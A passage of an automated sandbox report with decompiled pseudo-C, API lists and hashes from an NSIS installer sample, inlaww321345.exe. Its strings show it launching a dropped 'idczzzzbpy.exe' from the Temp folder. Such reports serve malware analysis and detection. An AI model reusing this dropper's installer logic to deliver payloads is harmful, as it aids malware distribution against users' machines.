                    								__eflags = _v604.dwFileAttributes & 0x00000010;
                    								if(__eflags == 0) {
                    									_t52 = E00405D32(__eflags, _t68, _v8);
                    									__eflags = _t52;
                    									if(_t52 != 0) {
                    										E004056D0(0xfffffff2, _t68);
                    									} else {
                    										__eflags = _v8 - _t52;
                    										if(_v8 == _t52) {
                    											 *0x7a8b28 =  *0x7a8b28 + 1;
                    										} else {
                    											E004056D0(0xfffffff1, _t68);
                    											E0040642E(_t67, _t68, 0);
                    										}
                    									}
                    								} else {
                    									__eflags = (_a8 & 0x00000003) - 3;
                    									if(__eflags == 0) {
                    										E00405D7A(__eflags, _t68, _a8);
                    									}
                    								}
                    								goto L24;
                    							}
                    							__eflags = _v558;
                    							if(_v558 == 0) {
                    								goto L24;
                    							}
                    							__eflags = _v558 - 0x2e;
                    							if(_v558 != 0x2e) {
                    								goto L16;
                    							}
                    							__eflags = _v556;
                    							if(_v556 == 0) {
                    								goto L24;
                    							}
                    							goto L16;
                    							L24:
                    							_t55 = FindNextFileW(_t70,  &_v604); // executed
                    							__eflags = _t55;
                    						} while (_t55 != 0);
                    						_t38 = FindClose(_t70); // executed
                    						goto L26;
                    					}
                    					__eflags =  *0x7a3f90 - 0x5c;
                    					if( *0x7a3f90 != 0x5c) {
                    						goto L11;
                    					}
                    					goto L10;
                    				} else {
                    					__eflags = _t38;
                    					if(_t38 == 0) {
                    						L28:
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L36:
                    							return _t38;
                    						}
                    						__eflags = _v12;
                    						if(_v12 != 0) {
                    							_t38 = E004069A4(_t68);
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								goto L36;
                    							}
                    							E00405F3D(_t68);
                    							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
                    							__eflags = _t38;
                    							if(_t38 != 0) {
                    								return E004056D0(0xffffffe5, _t68);
                    							}
                    							__eflags = _v8;
                    							if(_v8 == 0) {
                    								goto L30;
                    							}
                    							E004056D0(0xfffffff1, _t68);
                    							return E0040642E(_t67, _t68, 0);
                    						}
                    						L30:
                    						 *0x7a8b28 =  *0x7a8b28 + 1;
                    						return _t38;
                    					}
                    					__eflags = _t65 & 0x00000002;
                    					if((_t65 & 0x00000002) == 0) {
                    						goto L28;
                    					}
                    					goto L5;
                    				}
                    			}



















                    APIs
                    • DeleteFileW.KERNELBASE(?,?,7620FAA0,7620F560,00000000), ref: 00405DA3
                    • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7620FAA0,7620F560,00000000), ref: 00405E14
                    • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7620FAA0,7620F560,00000000), ref: 00405E24
                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                    • FindClose.KERNELBASE(00000000), ref: 00405ED3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: .$.$\*.*
                    • API String ID: 2035342205-3749113046
                    • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                    • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                    • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                    • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004069A4(WCHAR* _a4) {
                    				void* _t2;
                    
                    				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
                    				if(_t2 == 0xffffffff) {
                    					return 0;
                    				}
                    				FindClose(_t2);
                    				return 0x7a4fd8;
                    			}





                    APIs
                    • FindFirstFileW.KERNELBASE(7620FAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560), ref: 004069AF
                    • FindClose.KERNEL32(00000000), ref: 004069BB
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                    • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                    • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                    • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 84%
                    			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                    				struct HWND__* _v28;
                    				void* _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t34;
                    				signed int _t36;
                    				signed int _t38;
                    				struct HWND__* _t48;
                    				signed int _t67;
                    				struct HWND__* _t73;
                    				signed int _t86;
                    				struct HWND__* _t91;
                    				signed int _t99;
                    				int _t103;
                    				signed int _t117;
                    				int _t118;
                    				int _t122;
                    				signed int _t124;
                    				struct HWND__* _t127;
                    				struct HWND__* _t128;
                    				int _t129;
                    				intOrPtr _t130;
                    				long _t133;
                    				int _t135;
                    				int _t136;
                    				void* _t137;
                    
                    				_t130 = _a8;
                    				if(_t130 == 0x110 || _t130 == 0x408) {
                    					_t34 = _a12;
                    					_t127 = _a4;
                    					__eflags = _t130 - 0x110;
                    					 *0x7a1f70 = _t34;
                    					if(_t130 == 0x110) {
                    						 *0x7a8aa8 = _t127;
                    						 *0x7a1f84 = GetDlgItem(_t127, 1);
                    						_t91 = GetDlgItem(_t127, 2);
                    						_push(0xffffffff);
                    						_push(0x1c);
                    						 *0x79ff50 = _t91;
                    						E004045CA(_t127);
                    						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
                    						 *0x7a7a6c = E0040140B(4);
                    						_t34 = 1;
                    						__eflags = 1;
                    						 *0x7a1f70 = 1;
                    					}
                    					_t124 =  *0x40a39c; // 0x0
                    					_t136 = 0;
                    					_t133 = (_t124 << 6) +  *0x7a8ac0;
                    					__eflags = _t124;
                    					if(_t124 < 0) {
                    						L36:
                    						E00404616(0x40b);
                    						while(1) {
                    							_t36 =  *0x7a1f70;
                    							 *0x40a39c =  *0x40a39c + _t36;
                    							_t133 = _t133 + (_t36 << 6);
                    							_t38 =  *0x40a39c; // 0x0
                    							__eflags = _t38 -  *0x7a8ac4;
                    							if(_t38 ==  *0x7a8ac4) {
                    								E0040140B(1);
                    							}
                    							__eflags =  *0x7a7a6c - _t136;
                    							if( *0x7a7a6c != _t136) {
                    								break;
                    							}
                    							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
                    							if(__eflags >= 0) {
                    								break;
                    							}
                    							_t117 =  *(_t133 + 0x14);
                    							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                    							_push( *((intOrPtr*)(_t133 + 0x20)));
                    							_push(0xfffffc19);
                    							E004045CA(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x1c)));
                    							_push(0xfffffc1b);
                    							E004045CA(_t127);
                    							_push( *((intOrPtr*)(_t133 + 0x28)));
                    							_push(0xfffffc1a);
                    							E004045CA(_t127);
                    							_t48 = GetDlgItem(_t127, 3);
                    							__eflags =  *0x7a8b2c - _t136;
                    							_v28 = _t48;
                    							if( *0x7a8b2c != _t136) {
                    								_t117 = _t117 & 0x0000fefd | 0x00000004;
                    								__eflags = _t117;
                    							}
                    							ShowWindow(_t48, _t117 & 0x00000008);
                    							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                    							E004045EC(_t117 & 0x00000002);
                    							_t118 = _t117 & 0x00000004;
                    							EnableWindow( *0x79ff50, _t118);
                    							__eflags = _t118 - _t136;
                    							if(_t118 == _t136) {
                    								_push(1);
                    							} else {
                    								_push(_t136);
                    							}
                    							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                    							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                    							__eflags =  *0x7a8b2c - _t136;
                    							if( *0x7a8b2c == _t136) {
                    								_push( *0x7a1f84);
                    							} else {
                    								SendMessageW(_t127, 0x401, 2, _t136);
                    								_push( *0x79ff50);
                    							}
                    							E004045FF();
                    							E0040666E(0x7a1f88, E004040AC());
                    							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
                    							SetWindowTextW(_t127, 0x7a1f88);
                    							_push(_t136);
                    							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								continue;
                    							} else {
                    								__eflags =  *_t133 - _t136;
                    								if( *_t133 == _t136) {
                    									continue;
                    								}
                    								__eflags =  *(_t133 + 4) - 5;
                    								if( *(_t133 + 4) != 5) {
                    									DestroyWindow( *0x7a7a78);
                    									 *0x7a0f60 = _t133;
                    									__eflags =  *_t133 - _t136;
                    									if( *_t133 <= _t136) {
                    										goto L60;
                    									}
                    									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                    									__eflags = _t73 - _t136;
                    									 *0x7a7a78 = _t73;
                    									if(_t73 == _t136) {
                    										goto L60;
                    									}
                    									_push( *((intOrPtr*)(_t133 + 0x2c)));
                    									_push(6);
                    									E004045CA(_t73);
                    									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                    									ScreenToClient(_t127, _t137 + 0x10);
                    									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                    									_push(_t136);
                    									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                    									__eflags =  *0x7a7a6c - _t136;
                    									if( *0x7a7a6c != _t136) {
                    										goto L63;
                    									}
                    									ShowWindow( *0x7a7a78, 8);
                    									E00404616(0x405);
                    									goto L60;
                    								}
                    								__eflags =  *0x7a8b2c - _t136;
                    								if( *0x7a8b2c != _t136) {
                    									goto L63;
                    								}
                    								__eflags =  *0x7a8b20 - _t136;
                    								if( *0x7a8b20 != _t136) {
                    									continue;
                    								}
                    								goto L63;
                    							}
                    						}
                    						DestroyWindow( *0x7a7a78); // executed
                    						 *0x7a8aa8 = _t136;
                    						EndDialog(_t127,  *0x7a0758); // executed
                    						goto L60;
                    					} else {
                    						__eflags = _t34 - 1;
                    						if(_t34 != 1) {
                    							L35:
                    							__eflags =  *_t133 - _t136;
                    							if( *_t133 == _t136) {
                    								goto L63;
                    							}
                    							goto L36;
                    						}
                    						_push(0);
                    						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                    						__eflags = _t86;
                    						if(_t86 == 0) {
                    							goto L35;
                    						}
                    						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
                    						__eflags =  *0x7a7a6c;
                    						return 0 |  *0x7a7a6c == 0x00000000;
                    					}
                    				} else {
                    					_t127 = _a4;
                    					_t136 = 0;
                    					if(_t130 == 0x47) {
                    						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
                    					}
                    					_t122 = _a12;
                    					if(_t130 != 5) {
                    						L8:
                    						if(_t130 != 0x40d) {
                    							__eflags = _t130 - 0x11;
                    							if(_t130 != 0x11) {
                    								__eflags = _t130 - 0x111;
                    								if(_t130 != 0x111) {
                    									goto L28;
                    								}
                    								_t135 = _t122 & 0x0000ffff;
                    								_t128 = GetDlgItem(_t127, _t135);
                    								__eflags = _t128 - _t136;
                    								if(_t128 == _t136) {
                    									L15:
                    									__eflags = _t135 - 1;
                    									if(_t135 != 1) {
                    										__eflags = _t135 - 3;
                    										if(_t135 != 3) {
                    											_t129 = 2;
                    											__eflags = _t135 - _t129;
                    											if(_t135 != _t129) {
                    												L27:
                    												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
                    												goto L28;
                    											}
                    											__eflags =  *0x7a8b2c - _t136;
                    											if( *0x7a8b2c == _t136) {
                    												_t99 = E0040140B(3);
                    												__eflags = _t99;
                    												if(_t99 != 0) {
                    													goto L28;
                    												}
                    												 *0x7a0758 = 1;
                    												L23:
                    												_push(0x78);
                    												L24:
                    												E004045A3();
                    												goto L28;
                    											}
                    											E0040140B(_t129);
                    											 *0x7a0758 = _t129;
                    											goto L23;
                    										}
                    										__eflags =  *0x40a39c - _t136; // 0x0
                    										if(__eflags <= 0) {
                    											goto L27;
                    										}
                    										_push(0xffffffff);
                    										goto L24;
                    									}
                    									_push(_t135);
                    									goto L24;
                    								}
                    								SendMessageW(_t128, 0xf3, _t136, _t136);
                    								_t103 = IsWindowEnabled(_t128);
                    								__eflags = _t103;
                    								if(_t103 == 0) {
                    									L63:
                    									return 0;
                    								}
                    								goto L15;
                    							}
                    							SetWindowLongW(_t127, _t136, _t136);
                    							return 1;
                    						}
                    						DestroyWindow( *0x7a7a78);
                    						 *0x7a7a78 = _t122;
                    						L60:
                    						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
                    							ShowWindow(_t127, 0xa);
                    							 *0x7a3f88 = 1;
                    						}
                    						goto L63;
                    					} else {
                    						asm("sbb eax, eax");
                    						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
                    						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                    							L28:
                    							return E00404631(_a8, _t122, _a16);
                    						} else {
                    							ShowWindow(_t127, 4);
                    							goto L8;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                    • ShowWindow.USER32(?), ref: 00404127
                    • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                    • ShowWindow.USER32(?,00000004), ref: 00404152
                    • DestroyWindow.USER32 ref: 00404166
                    • SetWindowLongW.USER32 ref: 0040417F
                    • GetDlgItem.USER32 ref: 0040419E
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                    • IsWindowEnabled.USER32(00000000), ref: 004041B9
                    • GetDlgItem.USER32 ref: 00404264
                    • GetDlgItem.USER32 ref: 0040426E
                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                    • GetDlgItem.USER32 ref: 0040437F
                    • ShowWindow.USER32(00000000,?), ref: 004043A0
                    • EnableWindow.USER32(?,?), ref: 004043B2
                    • EnableWindow.USER32(?,?), ref: 004043CD
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
                    • EnableMenuItem.USER32 ref: 004043EA
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                    • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                    • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
                    • ShowWindow.USER32(?,0000000A), ref: 00404587
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID:
                    • API String ID: 2475350683-0
                    • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                    • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                    • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                    • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (function 403d1d; nodes marked Executed / Not Executed)
                    C-Code - Quality: 96%
                    			E00403D1D(void* __eflags) {
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				int _v12;
                    				void _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t22;
                    				void* _t30;
                    				void* _t32;
                    				int _t33;
                    				void* _t36;
                    				int _t39;
                    				int _t40;
                    				int _t44;
                    				short _t63;
                    				WCHAR* _t65;
                    				signed char _t69;
                    				signed short _t73;
                    				WCHAR* _t76;
                    				intOrPtr _t82;
                    				WCHAR* _t87;
                    
                    				_t82 =  *0x7a8ab0;
                    				_t22 = E00406A3B(2);
                    				_t90 = _t22;
                    				if(_t22 == 0) {
                    					_t76 = 0x7a1f88;
                    					L"1033" = 0x30;
                    					 *0x7b5002 = 0x78;
                    					 *0x7b5004 = 0;
                    					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
                    					__eflags =  *0x7a1f88;
                    					if(__eflags == 0) {
                    						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
                    					}
                    					lstrcatW(L"1033", _t76);
                    				} else {
                    					_t73 =  *_t22(); // executed
                    					E004065B5(L"1033", _t73 & 0x0000ffff);
                    				}
                    				E00403FF3(_t78, _t90);
                    				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
                    				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
                    				 *0x7a8b3c = 0x10000;
                    				if(E00406045(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                    					L16:
                    					if(E00406045(_t98, _t86) == 0) {
                    						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                    					}
                    					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
                    					 *0x7a7a88 = _t30;
                    					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                    						L21:
                    						if(E0040140B(0) == 0) {
                    							_t32 = E00403FF3(_t78, __eflags);
                    							__eflags =  *0x7a8b40;
                    							if( *0x7a8b40 != 0) {
                    								_t33 = E004057A3(_t32, 0);
                    								__eflags = _t33;
                    								if(_t33 == 0) {
                    									E0040140B(1);
                    									goto L33;
                    								}
                    								__eflags =  *0x7a7a6c;
                    								if( *0x7a7a6c == 0) {
                    									E0040140B(2);
                    								}
                    								goto L22;
                    							}
                    							ShowWindow( *0x7a1f68, 5); // executed
                    							_t39 = E004069CB("RichEd20"); // executed
                    							__eflags = _t39;
                    							if(_t39 == 0) {
                    								E004069CB("RichEd32");
                    							}
                    							_t87 = L"RichEdit20W";
                    							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
                    							__eflags = _t40;
                    							if(_t40 == 0) {
                    								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
                    								 *0x7a7a64 = _t87;
                    								RegisterClassW(0x7a7a40);
                    							}
                    							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
                    							E00403C6D(E0040140B(5), 1);
                    							return _t44;
                    						}
                    						L22:
                    						_t36 = 2;
                    						return _t36;
                    					} else {
                    						_t78 =  *0x7a8aa0;
                    						 *0x7a7a44 = E00401000;
                    						 *0x7a7a50 =  *0x7a8aa0;
                    						 *0x7a7a54 = _t30;
                    						 *0x7a7a64 = 0x40a3b4;
                    						if(RegisterClassW(0x7a7a40) == 0) {
                    							L33:
                    							__eflags = 0;
                    							return 0;
                    						}
                    						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                    						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
                    						goto L21;
                    					}
                    				} else {
                    					_t78 =  *(_t82 + 0x48);
                    					_t92 = _t78;
                    					if(_t78 == 0) {
                    						goto L16;
                    					}
                    					_t76 = 0x7a6a40;
                    					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
                    					_t63 =  *0x7a6a40; // 0x43
                    					if(_t63 == 0) {
                    						goto L16;
                    					}
                    					if(_t63 == 0x22) {
                    						_t76 = 0x7a6a42;
                    						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
                    					}
                    					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                    					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                    						L15:
                    						E0040666E(_t86, E00405F3D(_t76));
                    						goto L16;
                    					} else {
                    						_t69 = GetFileAttributesW(_t76);
                    						if(_t69 == 0xffffffff) {
                    							L14:
                    							E00405F89(_t76);
                    							goto L15;
                    						}
                    						_t98 = _t69 & 0x00000010;
                    						if((_t69 & 0x00000010) != 0) {
                    							goto L15;
                    						}
                    						goto L14;
                    					}
                    				}
                    			}

                    APIs
                      • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                      • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                    • GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
                      • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                    • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,?,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7620FAA0), ref: 00403E1E
                    • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,?,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,?,00000000,?), ref: 00403E3C
                    • LoadImageW.USER32 ref: 00403E85
                    • RegisterClassW.USER32 ref: 00403EC2
                    • SystemParametersInfoW.USER32 ref: 00403EDA
                    • CreateWindowExW.USER32 ref: 00403F0F
                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
                    • GetClassInfoW.USER32 ref: 00403F71
                    • GetClassInfoW.USER32 ref: 00403F7E
                    • RegisterClassW.USER32 ref: 00403F87
                    • DialogBoxParamW.USER32 ref: 00403FA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                    • API String ID: 606308-686599481
                    • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                    • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                    • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                    • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (function 4030d0; nodes marked Executed / Not Executed)
                    C-Code - Quality: 97%
                    			E004030D0(void* __eflags, signed int _a4) {
                    				long _v8;
                    				long _v12;
                    				intOrPtr _v16;
                    				long _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				short _v560;
                    				long _t54;
                    				void* _t57;
                    				void* _t61;
                    				intOrPtr _t64;
                    				void* _t67;
                    				intOrPtr* _t69;
                    				long _t81;
                    				signed int _t88;
                    				intOrPtr _t91;
                    				void* _t94;
                    				void* _t99;
                    				void* _t103;
                    				long _t104;
                    				long _t107;
                    				void* _t108;
                    
                    				_v8 = 0;
                    				_v12 = 0;
                    				 *0x7a8aac = GetTickCount() + 0x3e8;
                    				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe", 0x400);
                    				_t103 = E0040615E(L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe", 0x80000000, 3);
                    				 *0x40a018 = _t103;
                    				if(_t103 == 0xffffffff) {
                    					return L"Error launching installer";
                    				}
                    				E0040666E(0x7b4800, L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe");
                    				E0040666E(0x7b7000, E00405F89(0x7b4800));
                    				_t54 = GetFileSize(_t103, 0);
                    				 *0x79f740 = _t54;
                    				_t107 = _t54;
                    				if(_t54 <= 0) {
                    					L22:
                    					E0040302E(1);
                    					_pop(_t94);
                    					if( *0x7a8ab4 == 0) {
                    						goto L30;
                    					}
                    					if(_v12 == 0) {
                    						L26:
                    						_t57 = GlobalAlloc(0x40, _v20); // executed
                    						_t108 = _t57;
                    						 *0x40ce78 = 0xb;
                    						 *0x40ce90 = 0; // executed
                    						E0040618D(_t94,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                    						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                    						 *0x40a01c = _t61;
                    						if(_t61 != 0xffffffff) {
                    							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
                    							 *0x79f744 = _t64;
                    							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                    							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
                    							if(_t67 == _v20) {
                    								 *0x7a8ab0 = _t108;
                    								 *0x7a8ab8 =  *_t108;
                    								if((_v40 & 0x00000001) != 0) {
                    									 *0x7a8abc =  *0x7a8abc + 1;
                    								}
                    								_t45 = _t108 + 0x44; // 0x44
                    								_t69 = _t45;
                    								_t99 = 8;
                    								do {
                    									_t69 = _t69 - 8;
                    									 *_t69 =  *_t69 + _t108;
                    									_t99 = _t99 - 1;
                    								} while (_t99 != 0);
                    								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
                    								E00406119(0x7a8ac0, _t108 + 4, 0x40);
                    								return 0;
                    							}
                    							goto L30;
                    						}
                    						return L"Error writing temporary file. Make sure your temp folder is valid.";
                    					}
                    					E004035FE( *0x79f730);
                    					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
                    						goto L30;
                    					} else {
                    						goto L26;
                    					}
                    				} else {
                    					do {
                    						_t104 = _t107;
                    						asm("sbb eax, eax");
                    						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
                    						if(_t107 >= _t81) {
                    							_t104 = _t81;
                    						}
                    						if(E004035E8(0x797730, _t104) == 0) {
                    							E0040302E(1);
                    							L30:
                    							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                    						}
                    						if( *0x7a8ab4 != 0) {
                    							if((_a4 & 0x00000002) == 0) {
                    								E0040302E(0);
                    							}
                    							goto L19;
                    						}
                    						E00406119( &_v40, 0x797730, 0x1c);
                    						_t88 = _v40;
                    						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                    							_a4 = _a4 | _t88;
